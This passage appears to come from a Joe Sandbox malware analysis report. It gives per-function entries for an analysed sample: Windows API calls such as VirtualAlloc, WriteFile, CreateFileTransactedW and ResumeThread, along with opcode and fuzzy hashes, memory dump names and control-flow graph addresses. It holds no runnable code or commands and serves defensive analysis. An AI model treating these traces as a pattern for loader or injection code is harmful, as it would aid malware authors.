                                                              • Opcode Fuzzy Hash: 8d329d8f8db0380658a6abee657ffbff3994db3f3f9144aa48be1a9ec856b981
                                                              • Instruction Fuzzy Hash: 0901DB7534870B6FDB307E649C99F7673A9FB40751F14002EF686D2381DBB1A8954724
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0088E2E8: _swprintf.LIBCMT ref: 0088E30E
                                                                • Part of subcall function 0088E2E8: _strlen.LIBCMT ref: 0088E32F
                                                                • Part of subcall function 0088E2E8: SetDlgItemTextW.USER32(?,008BE274,?), ref: 0088E38F
                                                                • Part of subcall function 0088E2E8: GetWindowRect.USER32(?,?), ref: 0088E3C9
                                                                • Part of subcall function 0088E2E8: GetClientRect.USER32(?,?), ref: 0088E3D5
                                                              • GetDlgItem.USER32(00000000,00003021), ref: 0088135A
                                                              • SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                              • String ID: 0
                                                              • API String ID: 2622349952-4108050209
                                                              • Opcode ID: b74e5ea71c49e76b407df868860a247cc49714961450eaa04d6579b7b3dacdde
                                                              • Instruction ID: eda292d63c5025264faee37ad41edb2c12584f9ab1272333bb46b97257f249bc
                                                              • Opcode Fuzzy Hash: b74e5ea71c49e76b407df868860a247cc49714961450eaa04d6579b7b3dacdde
                                                              • Instruction Fuzzy Hash: D1F03C30144288ABDF252F65884DBEA3B6DFB45344F048618FD46D5AA2CF78CA96AB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00891206,?), ref: 00890FEA
                                                              • GetLastError.KERNEL32(?), ref: 00890FF6
                                                                • Part of subcall function 00886C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00886C54
                                                              Strings
                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00890FFF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                              • API String ID: 1091760877-2248577382
                                                              • Opcode ID: 3a07c23c397102f41c4ad38259be2a60e4beb35325539e79ebfb1be189033828
                                                              • Instruction ID: 1848b3a275791186850d768d6eedf80d63594f5f6740770aa5357b1900c8f2d2
                                                              • Opcode Fuzzy Hash: 3a07c23c397102f41c4ad38259be2a60e4beb35325539e79ebfb1be189033828
                                                              • Instruction Fuzzy Hash: 43D02B3150893276CE1033285D0AD6E7905FF12331F140704F138D03F2CB2549925392
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,0088DA55,?), ref: 0088E2A3
                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0088DA55,?), ref: 0088E2B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: FindHandleModuleResource
                                                              • String ID: RTL
                                                              • API String ID: 3537982541-834975271
                                                              • Opcode ID: 66becb13ab3a20880edf5bfce3bdbe4a456e9d14b7b631d30ff074867e8bf9ea
                                                              • Instruction ID: 374daad87327dfce96e87facd162a1f3b447c2917c48688ada6fac5e4f338458
                                                              • Opcode Fuzzy Hash: 66becb13ab3a20880edf5bfce3bdbe4a456e9d14b7b631d30ff074867e8bf9ea
                                                              • Instruction Fuzzy Hash: 05C01231284F2066E63037646C0DB836B98BF01B11F050548B181EA2D2D6A5D54187A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:17.6%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:26
                                                              Total number of Limit Nodes:2
                                                              execution_graph 13990 7ff848f49ebd 13991 7ff848faffe0 13990->13991 13992 7ff848fb0052 13991->13992 13995 7ff848faf1d0 13991->13995 13994 7ff848fb00c9 13997 7ff848faf1db 13995->13997 13996 7ff848faf27e 13996->13994 13997->13996 13999 7ff848faf297 13997->13999 14000 7ff848faf2a2 13999->14000 14001 7ff848faf2ea ResumeThread 13999->14001 14000->13996 14003 7ff848faf3b4 14001->14003 14003->13996 13974 7ff848f4bc35 13976 7ff848f4bc5f WriteFile 13974->13976 13977 7ff848f4bdcf 13976->13977 13978 7ff848f4da35 13979 7ff848f4da5f VirtualAlloc 13978->13979 13981 7ff848f4db7f 13979->13981 13982 7ff848f4a390 13983 7ff848f4a39c 13982->13983 13986 7ff848f49fb0 13983->13986 13985 7ff848f4a400 13987 7ff848f49fb9 CreateFileTransactedW 13986->13987 13989 7ff848f4bba8 13987->13989 13989->13985 14004 7ff848f4d5d1 14005 7ff848f4d5ed GetSystemInfo 14004->14005 14007 7ff848f4d6c5 14005->14007

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 661 7ff84913d1c1-7ff84913d1c2 662 7ff84913d1f0-7ff84913d222 661->662 663 7ff84913d1c4-7ff84913d1df 661->663 672 7ff84913d250-7ff84913d262 662->672 673 7ff84913d224-7ff84913d241 662->673 663->662 677 7ff84913d290-7ff84913d2ae 672->677 678 7ff84913d264-7ff84913d28e 672->678 681 7ff84913d243-7ff84913d24e 673->681 682 7ff84913d2b5-7ff84913d2c2 673->682 677->682 678->677 681->672 688 7ff84913d2f0-7ff84913d322 682->688 689 7ff84913d2c4-7ff84913d2df 682->689 702 7ff84913d350-7ff84913d362 688->702 703 7ff84913d324-7ff84913d341 688->703 689->688 707 7ff84913d390-7ff84913d3ae 702->707 708 7ff84913d364-7ff84913d38e 702->708 712 7ff84913d343-7ff84913d34e 703->712 713 7ff84913d3b4-7ff84913d3c2 703->713 707->713 708->707 712->702 717 7ff84913d3f0-7ff84913d422 713->717 718 7ff84913d3c4-7ff84913d3df 713->718 732 7ff84913d450-7ff84913d462 717->732 733 7ff84913d424-7ff84913d437 717->733 718->717 738 7ff84913d490-7ff84913d541 732->738 739 7ff84913d464-7ff84913d48e 732->739 733->732 761 7ff84913d543-7ff84913d5ae 738->761 762 7ff84913d5b2-7ff84913d649 738->762 739->738 761->762 786 7ff84913d64b-7ff84913d6b6 762->786 787 7ff84913d6b9-7ff84913d749 762->787 786->787 811 7ff84913d74b-7ff84913d7b6 787->811 812 7ff84913d7b8-7ff84913d849 787->812 811->812 837 7ff84913d84b-7ff84913d8b6 812->837 838 7ff84913d8b7-7ff84913d949 812->838 837->838 863 7ff84913d94b-7ff84913d9b5 838->863 864 7ff84913d9b6-7ff84913db41 838->864 863->864 894 7ff84913dbac-7ff84913dc3e 864->894 895 7ff84913db43-7ff84913db6a 864->895 901 7ff84913dc3f-7ff84913dc45 894->901 895->894 902 7ff84913dc47-7ff84913dc49 901->902 903 7ff84913dc46 901->903 905 7ff84913dc4b-7ff84913dca0 902->905 906 7ff84913dcb3-7ff849144209 902->906 903->902 905->901 914 7ff84913dca2-7ff84913dcb2 905->914 923 7ff8491441bd 906->923 914->906 924 7ff8491441c8-7ff84914420b 923->924 929 7ff849144218-7ff84914421a 924->929 930 7ff8491441f1-7ff849144216 call 7ff849142dc8 924->930 931 7ff8491441fc 929->931 933 7ff84914421c-7ff849144221 call 7ff849142db8 931->933 940 7ff8491441fe-7ff849144204 933->940
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: o,_^$p,_^$q,_^$r,_^
                                                              • API String ID: 0-3953216542
                                                              • Opcode ID: 4ccb5fdcb559dc1bee2b41f81867d1709da03bc40dce4f97c870dc2ff2a0c5a5
                                                              • Instruction ID: cdbb27a68b0ed8b25e87cce36cb920b654c9dd05f047efa71812daa096243ba3
                                                              • Opcode Fuzzy Hash: 4ccb5fdcb559dc1bee2b41f81867d1709da03bc40dce4f97c870dc2ff2a0c5a5
                                                              • Instruction Fuzzy Hash: D7828863C1F2D29FE661BA78B8A60E77BB0EF022BDF1842B7D04C8D093DD0D65458659
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2229 7ff848f4b98a-7ff848f4b997 2230 7ff848f4b999-7ff848f4b9a1 2229->2230 2231 7ff848f4b9a2-7ff848f4ba68 2229->2231 2230->2231 2235 7ff848f4ba6a-7ff848f4ba81 2231->2235 2236 7ff848f4ba84-7ff848f4bba6 CreateFileTransactedW 2231->2236 2235->2236 2237 7ff848f4bbae-7ff848f4bc30 2236->2237 2238 7ff848f4bba8 2236->2238 2238->2237
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID: CreateFileTransacted
                                                              • String ID:
                                                              • API String ID: 2149338676-0
                                                              • Opcode ID: 34736dda07323a20d50ff1195ab9bc03d2b4bc402316bfbf27baf99b4a942bec
                                                              • Instruction ID: 8eac32b847cc3fae0a4467446e05b98bc48e75436032f6a2287483ddc235e263
                                                              • Opcode Fuzzy Hash: 34736dda07323a20d50ff1195ab9bc03d2b4bc402316bfbf27baf99b4a942bec
                                                              • Instruction Fuzzy Hash: 56912470908A5C8FDB99DF58C894BE9BBF1FB6A310F1001AED04DE3291DB75A984CB44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5fe5e1e6df9354223fa62f2fa338722139666477f083f4e3acc9f0b07681271e
                                                              • Instruction ID: 5a63cda99387ba3245ea57d7ab3e02b82957f6515fe861051c7723bfb1abf6b2
                                                              • Opcode Fuzzy Hash: 5fe5e1e6df9354223fa62f2fa338722139666477f083f4e3acc9f0b07681271e
                                                              • Instruction Fuzzy Hash: 8D81EF70908A1C8FDB98EF58C894BA9BBF1FB69300F1051AED04EE3651DB75A984CF44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: 482d954dc04aa8161986302684e042896f67a5da41a47448b6e271ad77a745b4
                                                              • Instruction ID: 1f5228a33e291d6f7a95c0cd6db5f3f357b01d326cd2b202037624ed7de78ede
                                                              • Opcode Fuzzy Hash: 482d954dc04aa8161986302684e042896f67a5da41a47448b6e271ad77a745b4
                                                              • Instruction Fuzzy Hash: 0AF11230A1DA458FE768EF28948257577E0FF95394B1446BAD04EC7297DA28E843CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: b9a59323b2d7229345ed0409d0202fa9398cb8b305da9b231470690b002eac1a
                                                              • Instruction ID: f62933348f1a23e9f90160c62da1b4d4282120e7f69f3258cea186b97c9037a1
                                                              • Opcode Fuzzy Hash: b9a59323b2d7229345ed0409d0202fa9398cb8b305da9b231470690b002eac1a
                                                              • Instruction Fuzzy Hash: 46612470908A5C8FDB98DF58C885BE9BBF0FB69311F1001AED04DE3292DB74A985CB44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem
                                                              • String ID:
                                                              • API String ID: 31276548-0
                                                              • Opcode ID: a7352fad5f7f0ba6851c44f99d2c509a6465687fc7f37dad7fa2181a8ca6297e
                                                              • Instruction ID: e2caf8db9c699fa071342083ad3132570a7e8915d406b9fe2a1a6c30ea172e9a
                                                              • Opcode Fuzzy Hash: a7352fad5f7f0ba6851c44f99d2c509a6465687fc7f37dad7fa2181a8ca6297e
                                                              • Instruction Fuzzy Hash: AB416D71908A4C8FEB98EF98D849AE9BBF0FB65311F00416BD04DD7292DB34A849CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: c96911c143af07fdfa0a27a79e09a934bffcefa506920a824e8598b45bdf8e98
                                                              • Instruction ID: 73115f95258ab27ec786ae3f03036b461646455cceac557d8edcd9b78a423a7b
                                                              • Opcode Fuzzy Hash: c96911c143af07fdfa0a27a79e09a934bffcefa506920a824e8598b45bdf8e98
                                                              • Instruction Fuzzy Hash: EF413874D08A0C8FDB98EF98D885AEDBBF0FB59310F10416AD40DE7252DB75A886CB44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem
                                                              • String ID:
                                                              • API String ID: 31276548-0
                                                              • Opcode ID: 16dc75b099f5272cc0cb5294284e3b723ec783bac5d6e0a8b2d9fc72c8cef552
                                                              • Instruction ID: 917a431441ed0f57000f03d7b046d5f91350259009167eed41a194c5b2f713f0
                                                              • Opcode Fuzzy Hash: 16dc75b099f5272cc0cb5294284e3b723ec783bac5d6e0a8b2d9fc72c8cef552
                                                              • Instruction Fuzzy Hash: 0041A17090D68C8FDB99EFA8D849BE9BBF0EF66310F0441ABD04DD7292DA745845CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 455d72ec8ef17a084b6380557acdf5f076741b37ab1303cec9fd9471c704d2a5
                                                              • Instruction ID: 313d0dad4cd2f05919efb173a1b7b952c165b8aa3fd99bb515458dcf1d1a6c4d
                                                              • Opcode Fuzzy Hash: 455d72ec8ef17a084b6380557acdf5f076741b37ab1303cec9fd9471c704d2a5
                                                              • Instruction Fuzzy Hash: 82512A70918A5C8FDB58EF58C855BE9BBF0FB69314F1041AAD04DE3252DB70A985CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 75070f896b800648eb2c88ef7ccd93072e4f92524047b77838777e7928a30e5c
                                                              • Instruction ID: 7dc12eb89850059491261dda7fcdc42fb7bb062fdf5deb4c6db6046b60cacdc6
                                                              • Opcode Fuzzy Hash: 75070f896b800648eb2c88ef7ccd93072e4f92524047b77838777e7928a30e5c
                                                              • Instruction Fuzzy Hash: 28512831D1D68A9FEB69EF98C4555BDBBB1FF54340F1041BBC00EA7282DA39A905CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 4e128276b4f19243985e25ee7dd3fc77fc5bb1ae72d5fb13c38ff59b61958056
                                                              • Instruction ID: bdddc9e40d8d6c1a483b55ecf361511547778db8f66c47e41cd5d7f82bb46e4b
                                                              • Opcode Fuzzy Hash: 4e128276b4f19243985e25ee7dd3fc77fc5bb1ae72d5fb13c38ff59b61958056
                                                              • Instruction Fuzzy Hash: 2C511770D0C58A9FEB69EFA884545BDBBB1FF55340F5041AAC00EE72C2DA38A905CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: s&
                                                              • API String ID: 0-841890644
                                                              • Opcode ID: bb338b6abddd6b4273eec9f8552b899de785a30ca8a21059d0b3dcb79bece242
                                                              • Instruction ID: e06057985d3884ab6b0ca0b59c4940a9fcc3bbf09c992ac87faeb96117f9cfd1
                                                              • Opcode Fuzzy Hash: bb338b6abddd6b4273eec9f8552b899de785a30ca8a21059d0b3dcb79bece242
                                                              • Instruction Fuzzy Hash: 7D31A771E1C98A8FFB79BB2898125A4B7E1FF45351F44017BD01DC76C2DE1CA8468B91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: s&
                                                              • API String ID: 0-841890644
                                                              • Opcode ID: c318c30c5a7ddf726f0048994dba72e26781287a2e6a8a36113f6121b2c5c604
                                                              • Instruction ID: 67c9ddc3dbe0f5a3718b7a7b6c776b47e9199fdeb807d7a78fdf671be26a6431
                                                              • Opcode Fuzzy Hash: c318c30c5a7ddf726f0048994dba72e26781287a2e6a8a36113f6121b2c5c604
                                                              • Instruction Fuzzy Hash: 0F21D970E1885D9FDFA9EF58C465AEDB7B1FF68314F0001AAD00EE3291CA39A9418F41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 332c65c3252da89de4003d3b918b94578a9de48a88603c6c8750a0359146baf1
                                                              • Instruction ID: 8a38dc1a224f9e32304af46fa34388328fe9ccad0a620d3405bb3724b6441791
                                                              • Opcode Fuzzy Hash: 332c65c3252da89de4003d3b918b94578a9de48a88603c6c8750a0359146baf1
                                                              • Instruction Fuzzy Hash: DFE18A705186868FFB69DF18C0E45B537B1FF44351B5446BEC85E8B68ADA3CE882CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e35922cd0787eb3b8b6112b358b8767d378ce18b30b1af1557d9cd5aca394c36
                                                              • Instruction ID: 202260d48e61d69c25bff81eb286bf750166ceddcca24a5f8110ed3da0b4d80a
                                                              • Opcode Fuzzy Hash: e35922cd0787eb3b8b6112b358b8767d378ce18b30b1af1557d9cd5aca394c36
                                                              • Instruction Fuzzy Hash: B8D18C7051C5968FEB69DF58C0D05B13BB1FF59350B5446BEC85E8B68ACA3CE882CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d384d3d5d7523b906d4364c5c478565ca7f2ae7b085731592b502a4d697451e5
                                                              • Instruction ID: ab559b43cceb3e5aecc074bbc2adc7935229e87803aed15f6e6646f6a90a0292
                                                              • Opcode Fuzzy Hash: d384d3d5d7523b906d4364c5c478565ca7f2ae7b085731592b502a4d697451e5
                                                              • Instruction Fuzzy Hash: 68C17B7051C5968FEB29DF58C0905B13BB1FF55350B5446BEC89E8B68BCA3CE881CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8ed949e56cd83d907e83a543d20c5b3247a1d9a62a10271e0859a33f97cbb972
                                                              • Instruction ID: 5be735c5c818f7a2507a716602d69206e056d085b2b267748590e0b1f08ac9cb
                                                              • Opcode Fuzzy Hash: 8ed949e56cd83d907e83a543d20c5b3247a1d9a62a10271e0859a33f97cbb972
                                                              • Instruction Fuzzy Hash: 1DB1F63091D68ACFE779AF2894555B877A0FF58340F2409BED44EC7186DE2CA8868F81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b33921cbc552ca4d9940ef44356dab98e02d36135833d1d3a533daacf3874713
                                                              • Instruction ID: 7f40c33a86d2b1365c4407694cec93fedc42d331aeed27ace30cc0e3726f4425
                                                              • Opcode Fuzzy Hash: b33921cbc552ca4d9940ef44356dab98e02d36135833d1d3a533daacf3874713
                                                              • Instruction Fuzzy Hash: 4DC19030A1CA869FE769EF58D0506A4BBB1FF55350F54417AC04EC7AC6CB2CE851CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dfc3ac7756a12655e8ad3fb7236b149af85983ab6f06870689834bc9b9ab7ab5
                                                              • Instruction ID: b5f9d441010d4c6f6757d4d65b455214564606e717e17a5b6a6ff11c4b4eeaa2
                                                              • Opcode Fuzzy Hash: dfc3ac7756a12655e8ad3fb7236b149af85983ab6f06870689834bc9b9ab7ab5
                                                              • Instruction Fuzzy Hash: B7C18070A1CA869FE769EF28C1916A4B7B1FF48350F54417BC04EC7A86DB2CE851CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 59122a1fb4079a0b38cf3fd7206bf2ebbd476560694be7ac7bc221c5657cad25
                                                              • Instruction ID: 63c321a0025a88a8ebd9e6045ad305ca50a80b3d13ef3323ea114605662bdc54
                                                              • Opcode Fuzzy Hash: 59122a1fb4079a0b38cf3fd7206bf2ebbd476560694be7ac7bc221c5657cad25
                                                              • Instruction Fuzzy Hash: 0E213822D0D1D78EF1787E7828198FD1A70AF537A0F1806BBC40D860C3DC0CA8815F96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
